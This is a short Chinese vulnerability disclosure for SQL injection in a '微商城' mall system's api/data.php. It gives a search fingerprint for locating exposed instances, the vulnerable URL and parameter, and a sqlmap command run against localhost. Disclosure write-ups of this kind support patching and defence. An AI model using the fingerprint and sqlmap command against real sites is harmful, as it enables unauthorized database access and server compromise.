登录 白背景
源码

微商城系统data.php存在sql注入漏洞

一、漏洞简介

微微商城系统data.php存在sql注入漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

二、影响版本

  • 微商城系统

三、资产测绘

body="/Mao_Public/js/jquery-2.1.1.min.js"

1724292361257-be0032d1-5656-465e-8c18-3c0176e17f66.png

四、漏洞复现

/api/data.php?mod=list&lx=2&search=123

访问时提示非法请求,不用管

1724851491247-fc6a7d62-4360-42c5-ab15-5585d3a6c7cd.png

sqlmap直接跑

python sqlmap.py -u "http://127.0.0.1/api/data.php?mod=list&lx=2&search=123" -p search --threads 10 --batch --level 3

1724851550336-56994d45-7581-4191-b303-6a9c33d296fd.png

原文: https://www.yuque.com/xiaokp7/ocvun2/evd3ktsgi09voiqi